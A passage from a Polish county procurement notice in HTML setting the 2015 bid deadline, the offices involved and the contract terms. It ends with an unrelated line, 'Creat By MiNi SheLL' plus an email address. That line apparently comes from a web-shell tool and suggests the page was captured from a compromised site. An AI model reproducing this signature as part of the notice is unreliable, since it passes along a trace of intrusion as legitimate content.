W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatdrawski.pl w zakładce Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie
pokój nr 302, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 12:00, miejsce: Starostwo Powiatowe
Pl. E. Orzeszkowej 3
78-500 Drawsko Pomorskie
pokój nr 115 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com